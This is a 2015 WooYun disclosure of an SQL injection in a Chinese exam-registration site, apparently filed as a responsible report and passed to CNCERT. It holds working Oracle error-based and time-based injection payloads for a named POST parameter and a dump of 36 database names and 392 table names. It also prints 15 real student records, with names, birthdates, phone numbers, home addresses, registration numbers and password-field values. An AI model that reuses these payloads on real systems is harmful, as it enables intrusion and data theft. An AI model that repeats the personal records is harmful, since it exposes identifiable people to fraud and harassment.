当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136746

漏洞标题:中国报检员主站SQL注入一枚

相关厂商:中国出入境检验检疫协会

漏洞作者: 次要人物

提交时间:2015-08-28 23:23

修复时间:2015-10-12 15:36

公开时间:2015-10-12 15:36

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-28: 细节已通知厂商并且等待厂商处理中
2015-08-28: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-07: 细节向核心白帽子及相关领域专家公开
2015-09-17: 细节向普通白帽子公开
2015-09-27: 细节向实习白帽子公开
2015-10-12: 细节向公众公开

简要描述:

起因,查看该网站,发现了SQL

详细说明:

发现了该漏洞,原本打算提交给相关负责人,但是一时也没找到。所以就找乌云了。
SQL注入漏洞,涉及36个数据库,貌似很多黑产喜欢这种网站,所以危害还是蛮大的,考生的数据都会被爆。but我是好人,所以果断提交乌云。

漏洞证明:

SQL注入一枚:http://**.**.**.**/bjy/zhmm.jsp (POST)
stud_figure_type=%E5%86%9B%E5%AE%98%E8%AF%81&stud_figure_no=ssP&stud_checker_mb=ssd&status=y
漏洞证明:涉及的数据库
Parameter: stud_figure_no (POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: stud_figure_type=%E5%86%9B%E5%AE%98%E8%AF%81&stud_figure_no=ZAP'||(SELECT 'eFTq' FROM DUAL WHERE 1526=1526 AND 7768=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(120)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (7768=7768) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(113)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL))||'&stud_checker_mb=ZAP&status=y
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: stud_figure_type=%E5%86%9B%E5%AE%98%E8%AF%81&stud_figure_no=ZAP'||(SELECT 'JcTA' FROM DUAL WHERE 7111=7111 AND 9049=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(113)||CHR(97)||CHR(83),5))||'&stud_checker_mb=ZAP&status=y
---
web application technology: JSP
back-end DBMS: Oracle
available databases [36]:
[*] APEX_030200
[*] APPQOSSYS
[*] BIAOQIAN
[*] CBN
[*] CERTDBA
[*] CHENGGUO
[*] CIQAITHAMEMBERCENTER
[*] CIQASHOP
[*] CIQMEMBER
[*] CMS
[*] CREDIT
[*] CTXSYS
[*] DBSNMP
[*] EXAMUSR01
[*] EXFSYS
[*] FLOWS_FILES
[*] IQID
[*] JYJD
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PEOPLE
[*] PEOPLES
[*] PERMIT
[*] QIYE
[*] SCOTT
[*] SSO
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WEBWZ
[*] WMSYS
[*] XDB
current schema (equivalent to database on Oracle): 'EXAMUSR01'
Database: EXAMUSR01
[392 tables]
+--------------------------------+
| SYSTEM_USER |
| ACCLOG |
| ADMINUSER |
| ADS |
| ANSWER_INFO |
| AREA |
| AREA_ROOM |
| AUDITING_GRANT |
| A_AUDITING_GRANT |
| A_ROOM_ASSIGN_GRANT |
| BBSCONF |
| BBS_USER |
| BJY0401 |
| BJY0402 |
| BJY0501 |
| BJY0502 |
| BJY0601 |
| BJY0602 |
| BJY0701 |
| BJY0702 |
| BJY0801 |
| BJY0901 |
| BJY1001_2010 |
| BJY1101 |
| BJY1201 |
| BJY1301 |
| BJY1401 |
| BLACL_LIST |
| BOARD |
| BOARDS |
| BUSINESS |
| CLASS_ROOM |
| COMPETENCY |
| COMPETENCY2011 |
| COMPETENCY_0602 |
| COMPETENCY_2008 |
| COMPETENCY_2009 |
| COMPETENCY_2010 |
| COMPETENCY_2012 |
| CREATE$JAVA$LOB$TABLE |
| DATA |
| DATAFAVOURITE |
| DECLARECARD |
| DECLARECOMPETENCE |
| DICTIONARY |
| DY |
| ELITE |
| EPC_CLI_COLLECTION |
| EPC_CLI_COLLECT_BY_EVENTID |
| EPC_CLI_COLLECT_BY_USERID |
| EPC_CLI_ENVIRONMENT |
| EPC_CLI_ENVIRONMENT_VERSION |
| EPC_CLI_FDF_FILE |
| EPC_CLI_FORMAT |
| EPC_CLI_JOB |
| EPC_CLI_NODE |
| EPC_CLI_PROGRESS |
| EPC_CLI_REP_USERS |
| EPC_CLI_SERVICE |
| EPC_CLI_USAGE |
| EPC_CLI_VERSION |
| EPC_MULTI_VIEWS |
| EPC_MULTI_VIEW_MAP |
| EPC_MVIEW_CATEGORY_MAP |
| EPC_PRIMARY_ITEMS |
| EPC_TDV_VERSION |
| EPC_VIEW |
| EPC_VIEW_CATEGORY |
| EPC_VIEW_ITEMS |
| EPC_VIEW_PREFERENCES |
| EXAMROOM |
| EXAMROOM_OFFICE |
| EXAM_PLAN |
| EXAM_ROOM_AREA |
| EXAM_ROOM_OFFICE |
| EXAM_TEMPLATE |
| FORUM |
| FORUMGROUP |
| FORUMUSER |
| FRIEND |
| FUNC_LIST |
| FUNC_OFFICE_LIST |
| FUNC_USER_LIST |
| GRADE_NUM |
| GRADE_TEMP |
| GRZC |
| GUESTBOOK |
| GUESTUSER |
| JAVA$CLASS$MD5$TABLE |
| KEY_WORD |
| MOBILE_MESSAGE |
| MODIFY_STUD |
| MSG_INFO |
| MYDATA |
| OFFICE_INFO |
| OFFICE_USER |
| PAPER |
| PAPERDETAIL |
| PAY_INFO |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| PHOTO |
| PLAN_TABLE |
| PROBLEM |
| PROVINCE |
| QUESTION_TYPE |
| REGINFO |
| REGNUM_RES |
| REG_USE_NUM |
| ROLE |
| ROLE_FUNC |
| ROOM_ASSIGN_GRANT |
| SCORE_LOG |
| SCORE_LOG_YD |
| SCORE_STATE |
| SCORE_STATE_YD |
| SEND_MESSAGE |
| SEND_MOBILE_RECORD |
| SGST |
| SGX2 |
| SHUQIAN |
| SIGN |
| SIGNUP |
| SIGNUP_2008 |
| SIGNUP_2010 |
| SIGNUP_2011 |
| SIGNUP_2012 |
| SIGNUP_2013 |
| SIGNUP_PLACE |
| SIGNUP_PLACE_2010 |
| SIGNUP_PLACE_2011 |
| SIGNUP_PLACE_2012 |
| SIGNUP_PLACE_2013 |
| SIGNUP_PLACE_2014 |
| SIGN_OFFICE |
| SMP_DBREPORT_SQLSCRIPTS |
| SMP_DBREPORT_TEMPLATE |
| SMP_LMV_DISPLAY_OPTION |
| SMP_LMV_REDO_LOG |
| SMP_LMV_SEARCH_OBJECT |
| SMP_LMV_SEARCH_RESULT |
| SMP_LOG_SQL |
| SMP_STANDBY_CONFIG_INFO |
| SMP_STANDBY_SITE_INFO |
| SMP_VAI_DBCONFIG |
| SMP_VAR_EBU_ACTIVE_JOB_ |
| SMP_VAR_EBU_SAVED_JOB_ |
| SMP_VAR_OS_ACTIVE_JOB_ |
| SMP_VAR_OS_SAVED_JOB_ |
| SMP_VAR_SMR_ACTIVE_JOB_ |
| SMP_VAR_SMR_CHANNEL_DEVICE_ |
| SMP_VAR_SMR_DEFAULT_CHANNEL_ |
| SMP_VAR_SMR_LIST_DATABASES_ |
| SMP_VAR_SMR_RC_CONNECT_STRING_ |
| SMP_VAR_SMR_SAVED_JOB_ |
| SMP_VAR_SMR_TEMP_SCRIPTS_ |
| SMP_VBOR_BACKUP_CONFIGURATION |
| SMP_VBOR_BLOB |
| SMP_VBOR_CHANNELS_INFORMATION |
| SMP_VBOR_DEFAULT_CONFIG |
| SMP_VBOR_STRATEGY_INFORMATION |
| SMP_VBO_JOB_CONFIG_TABLE |
| SMP_VBO_REPORTS |
| SMP_VBO_REPORTS_CONFIG |
| SMP_VBO_REPORTS_TYPE_DEFN |
| SMP_VBO_REPORT_ELEMENTS |
| SMP_VBO_REPORT_INFO_SOURCES |
| SMP_VDD_OPERATIONS_TABLE |
| SMP_VDE_EVENT |
| SMP_VDE_EVENT_ARCHIVE |
| SMP_VDE_EVENT_ARCHIVE_PURGE |
| SMP_VDE_EVENT_DETAILS |
| SMP_VDE_EVENT_LOCK_TAB |
| SMP_VDE_EVENT_LOG |
| SMP_VDE_EVENT_OCCURRENCE |
| SMP_VDE_EVENT_OCCUR_DETAILS |
| SMP_VDE_EVENT_TARGET_ACK |
| SMP_VDE_EVENT_TARGET_DETAILS |
| SMP_VDE_EVENT_TARGET_INFO |
| SMP_VDE_EVENT_TARGET_STATE |
| SMP_VDE_EVENT_UPDOWN_QUEUE |
| SMP_VDE_METRIC_THRESHOLDS |
| SMP_VDE_NODE_UPDOWN_QUEUE |
| SMP_VDE_THRESHOLD_ASSOC |
| SMP_VDE_TRY_REMOVE_EVENT_QUEUE |
| SMP_VDF_MASLIST |
| SMP_VDG_EVENTID_MAP |
| SMP_VDG_EVENT_DELETE_LIST |
| SMP_VDG_EVENT_NOTIF_LIST |
| SMP_VDG_GATEWAY_MAP |
| SMP_VDG_JOBID_MAP |
| SMP_VDG_NODE_LIST |
| SMP_VDG_NODE_LOCK_TABLE |
| SMP_VDI_AOBJECT_NOTIFICATION |
| SMP_VDI_OBJECT_TABLE |
| SMP_VDI_POS |
| SMP_VDI_TARGET_PROPERTIES |
| SMP_VDJ_JOB |
| SMP_VDJ_JOB_LOCK |
| SMP_VDJ_JOB_LOG |
| SMP_VDJ_JOB_LOG_COMMENT |
| SMP_VDJ_JOB_LOG_INTERMED |
| SMP_VDJ_JOB_OUTPUT |
| SMP_VDJ_JOB_PER_TARGET |
| SMP_VDJ_JOB_TARGET |
| SMP_VDM_ADDRESS |
| SMP_VDM_GLOBAL_INFO |
| SMP_VDM_LAST_NOTIF_SEQ_PERTYPE |
| SMP_VDM_NOTIFICATION |
| SMP_VDM_NOTIFICATION_DETAILS |
| SMP_VDM_NOTIFICATION_NVPAIRS |
| SMP_VDM_NOTIFICATION_SERVICES |
| SMP_VDM_PAGING_CARRIER_INFO |
| SMP_VDM_SESSION_NOTIFTYPE_PAIR |
| SMP_VDN_BLACKOUTSCHEDULE |
| SMP_VDN_GROUP_GROUP |
| SMP_VDN_GROUP_LIST |
| SMP_VDN_GROUP_TARGET |
| SMP_VDN_NODE_LIST |
| SMP_VDN_NOTIFY |
| SMP_VDN_STATE |
| SMP_VDN_TARGET_LIST |
| SMP_VDN_TARGET_PROPERTIES |
| SMP_VDN_TARGET_TYPE_DEFN |
| SMP_VDO_JOBID_SERVICEID |
| SMP_VDP_NODES |
| SMP_VDP_NODE_INFO |
| SMP_VDP_NODE_INFO_VDD |
| SMP_VDP_NODE_OMS_MAP |
| SMP_VDP_OMS_NUM_NODES |
| SMP_VDP_OMS_REGION_MAP |
| SMP_VDP_PGSRV_REGION_MAP |
| SMP_VDP_REGIONS |
| SMP_VDR_REGISTRY |
| SMP_VDS_REPOS_VERSION |
| SMP_VDS_SESSIONS_TABLE |
| SMP_VDU_CALLBACK_TABLE |
| SMP_VDU_OBJECTS_TABLE |
| SMP_VDU_PRINCIPALS_TABLE |
| SMP_VDU_PRIVILEGE_TABLE |
| SMP_VDV_DEFAULT_NOTIFY_PREFS |
| SMP_VDV_DEFAULT_PERMISSIONS |
| SMP_VDV_GENERAL |
| SMP_VDV_MAPI_EMAIL |
| SMP_VDV_NOTIFICATION_SCHEDULE |
| SMP_VDV_PAGE |
| SMP_VDV_PAGING |
| SMP_VDV_PREFERRED_CREDENTIALS |
| SMP_VDV_SERVICE_PARMS |
| SMP_VDV_SMTP_EMAIL |
| SMP_VDV_USER |
| SMP_VDV_USER_LOCALE |
| SMP_VDV_USER_PREF |
| SMP_VTA_DB_APP_POSITION_ |
| SMP_VTC_LAYOUT_PROPERTIES |
| SMP_VTD_CLIENT_STATE |
| SMP_VTD_DG_LOCATION |
| SMP_VTD_HISTORICAL_LOCATION |
| SMP_VTM_CHART_DEFN |
| SMP_VTM_CHART_STATE_TARG_SPEC |
| SMP_VTM_DISPLAY_STATE |
| SMP_VTM_RECORDING_DATA |
| SMP_VTM_UDCHART_COLUMNS |
| SMP_VTM_UDCHART_DEFN |
| SMP_VTP_UDCLASS_COLUMNS |
| SMP_VTP_UDCLASS_DEFN |
| SMP_VXA_SYSTEM_PREFS |
| STAT_BAOMIN |
| STAT_BJ_EVERYDAY |
| STAT_BY_TEST_AREA |
| STAT_FENSHU |
| STAT_SCORE |
| STUDENTS |
| STUDENTS_2008 |
| STUDENTS_2009 |
| STUDENTS_2010 |
| STUDENTS_2011 |
| STUDENTS_2012 |
| STUDENTS_2013 |
| STUD_Q_CARD |
| SUBJECT_TYPE |
| SYS_SYNC_TABLE |
| TABLE_NAME |
| TEMP_PAPER |
| TEMP_RANDOM_PROBLEM |
| TEMP_REPLACE_LIST |
| TEMP_SIGNUP |
| TEMP_SINGLE_REPLACE_LIST |
| TEMP_STUD_EXAM |
| TEMP_TIME |
| TEMP_TYPE_LACK |
| TEST_AREA |
| TEST_FIELD |
| TEST_TARGET |
| UNPOST |
| USERDATA |
| VBZ$CHANGE_PLANS |
| VBZ$COMPARISONS |
| VBZ$COMPARISON_RESULTS |
| VBZ$DB_OBJ_NAMES |
| VBZ$DESTINATIONS |
| VBZ$DIRECTIVES |
| VBZ$EDITED_SCRIPTS |
| VBZ$EXEMPLARS |
| VBZ$EX_UPDATES |
| VBZ$HISTORY |
| VBZ$IMPACT_LOG |
| VBZ$OBJECT_GRANTS |
| VBZ$OUTPUT_LOG |
| VBZ$ROLE_GRANTS |
| VBZ$SCHEMAMAPS |
| VBZ$SCRIPTS |
| VBZ$SYS_PRIV_GRANTS |
| VBZ$VERSION |
| VDK_APPLICATION |
| VDK_CLUSTER |
| VDK_CLUSTER_COLUMN |
| VDK_COLLECTION_ITEMS |
| VDK_COLUMN |
| VDK_CONSTRAINT |
| VDK_CONSTRAINT_COLUMN |
| VDK_DATABASE |
| VDK_DATAFILE |
| VDK_DATAFILE_STATS |
| VDK_DATAFILE_STATS_BEGIN |
| VDK_DBUSER |
| VDK_DELETE_QUEUE |
| VDK_FUNCTION |
| VDK_HOST_INFO |
| VDK_INDEX |
| VDK_INDEX_COLUMN |
| VDK_IND_PARTITIONS |
| VDK_IND_SUBPARTITIONS |
| VDK_INSTANCE |
| VDK_INSTANCE_BUFFER_STATS |
| VDK_INSTANCE_BUFFER_STATS_B |
| VDK_INSTANCE_PARAMS |
| VDK_INSTANCE_ROLLBACK_STATS |
| VDK_INSTANCE_SORT_STATS |
| VDK_INSTANCE_STATS |
| VDK_INSTANCE_STATS_BEGIN |
| VDK_LOG_TABLE |
| VDK_OBJECT |
| VDK_PART_INDEXES |
| VDK_PART_KEY_COLUMNS |
| VDK_PART_TABLES |
| VDK_REP_CONTROL |
| VDK_REQUEST |
| VDK_SEGMENT |
| VDK_SEQUENCE |
| VDK_SERVICE |
| VDK_SESSION |
| VDK_SQL |
| VDK_SQL_OBJECTS |
| VDK_SQL_STATEMENT_WORK |
| VDK_STORAGE_DEVICE |
| VDK_SUBPART_KEY_COLUMNS |
| VDK_SYNONYM |
| VDK_TABLE |
| VDK_TABLESPACE |
| VDK_TAB_PARTITIONS |
| VDK_TAB_SUBPARTITIONS |
| VDK_TMP_ANALYSIS_6 |
| VDK_TMP_JOURNAL_6 |
| VDK_TMP_RECOMMENDATION_6 |
| VDK_TMP_RULE_JOURNAL_6 |
| VDK_TMP_SQLCOLUMNREF_6 |
| VDK_TMP_SQLDEPEND_6 |
| VDK_TMP_SQLHINTREF_6 |
| VDK_TMP_SQLINDEX_6 |
| VDK_TMP_SQLTABLEREF_6 |
| VDK_TMP_SQLTABLE_6 |
| VDK_TMP_SQLTEXT_6 |
| VDK_TMP_SQLXREF_6 |
| VDK_USER_RULE |
| VMQ_DATABASE_PARAMS_DYNAMIC |
| VMQ_DATABASE_PARAMS_STATIC |
| VMQ_SQL_FAKE_INDEX |
| VMQ_SQL_FAKE_INDEX_COLUMNS |
| VMQ_SQL_IMPORT_STATS |
| VMQ_SQL_ITEM |
| VMQ_SQL_PLAN_COST_ALL |
| VMQ_SQL_PLAN_COST_FIRST |
| VMQ_SQL_PLAN_RULE |
| VMQ_SQL_STATS_COST_ALL |
| VMQ_SQL_STATS_COST_FIRST |
| VMQ_SQL_STATS_RULE |
| VMQ_SQL_TEXT |
| VMQ_SQL_UNQUALIFIED_NAMES |
+--------------------------------+
Database: EXAMUSR01
+---------------+---------+
| Table | Entries |
+---------------+---------+
| STUDENTS_2013 | 50589 |
+---------------+---------+
只是这个数据库中的这一个表就有50589条记录,那如果再加上其它表、其他数据库,这可能会泄漏的数据有多大就可想而知了。只是为了证明漏洞,所以几条记录就够了。
STUD_PWD,STUD_SEX,STUD_AGE,STUD_HOME,STUD_NAME,STUD_FOLK,STUD_EMAIL,STUD_LEVEL,STUD_REG_NO,STUD_RESUME,STUD_WORK_COM,STUD_CHECKER_MB,STUD_CHECKER_ADDR,STUD_CHECKER_POST,STUD_CHECKER_PHONE
1884014,女,1994/1/4,广东,陈嘉泳,汉,710711787@**.**.**.**,中专,47320540,本人现就读于广东机电职业技术学院,广东机电职业技术学院,13533879652,广东省广州市白云区沙太路蟾蜍东路2号广东机电职业技术学院,510440,13527870070
5242115,男,1987/9/29,甘肃,成雷雷,汉,173616020@**.**.**.**,高中,72793394,姓名,上海馨溢国际物流有限公司,13122576831,上海机场镇新和村,200120,13122576831
6507679,男,1993/6/6,浙江,姜巍,汉族,jerusalen@**.**.**.**,高中,84266102,高中毕业,浙江交通职业技术学院,15167188870,浙江交通职业技术学院,311112,64967186
9598204,女,1991/8/15,广西,韦敏,壮,447024529@**.**.**.**,高中,61318646,小学就读于广西凭祥市凭祥镇中心小学,NULL,15878705670,广西民族大学相思湖学院,530000,15878705670
4673082,女,1994/3/25,广西,杨入瑛,壮,337591349@**.**.**.**,高中,96346391,NULL,广西省南宁市西乡塘区大学东168号,18077780220,广西省南宁市西乡塘区大学东168号,530007,18077780220
3291967,女,1992/4/1,四川,吴玉洁,汉族,853062415@**.**.**.**,高中,45768229,2008,西华大学,18202822553,成都市西华大学本部11级国贸2班,610039,18202822553
4670464,女,1992/5/10,广东,郑玲频,汉族,476279373@**.**.**.**,中专,63057332,在读学生,在校学生,15992688630,广东科学技术职业学院,519000,15992688630
4374992,男,1991/12/16,福建,蓝荣贵,畲族,1251761626@**.**.**.**,高中,57633427,在校本科生取得会计证计算机一二级证书是优秀青年志愿者,NULL,13799415732,福建省上杭县官庄乡,364209,13799415732
8265403,女,1988/12/22,河北,李红晓,汉,boxingciye@**.**.**.**,高中,26512618,1996年09月--2002年07月年在上拔剑小学学习,邯郸市峰峰矿区博兴瓷业有限公司,15028046492,峰峰矿区义井镇上拔剑村,56200,3105421988
4922301,女,1965/10/11,云南,毕玉芹,汉,1457312987@**.**.**.**,大学本科,95816748,本人1987年7月从云南师范大学毕业后分配到畹町中学工作至今,畹町中学,13808783002,云南省德宏州畹町中学,678500,0692-5151662
2927293,男,1991/4/8,海南,张远,汉,zhangyuan199148@**.**.**.**,大学本科,45316535,琼州学院在校大学生,琼州学院,13138919625,海南省三亚市琼州学院7A304宿舍,572000,13138919625
5428357,女,1992/9/25,浙江,邱凯悦,汉族,1160878547@**.**.**.**,大学专科,87735916,2007年9月至2010年6月就读于源清中学,NULL,13750834017,浙江省杭州市江干区濮家新村7幢2单元304室,310004,13750834017
6049150,女,1985/10/26,福建,王少云,汉,83457726@**.**.**.**,大学本科,37784480,主要从事服装出口为主,NULL,18782299697,成都市武侯区武青北路76号上道西城C区12-1-301,610000,18782299697
3402731,男,1988/9/12,上海,方嘉桢,汉族,772760219@**.**.**.**,大学专科,99184898,本人做事态度认真,上海久恒国际货运代理有限公司,13701755382,宝山区宝林八村45号601室,201900,56119281
8138073,女,1993/10/9,浙江,戴蓉姚,汉族,291407611@**.**.**.**,中专,10878225,本人就读于嘉兴职业技术学院,NULL,15268308449,浙江省嘉兴市昌盛南路1123号,314000,15268308449
只提取了15条,以供证明。

修复方案:

找网站开发修,他们应该懂。过滤就可以了。

版权声明:转载请注明来源 次要人物@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-08-28 15:34

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT,由其后续协调网站管理单位处置

最新状态:

暂无


漏洞评价:

评论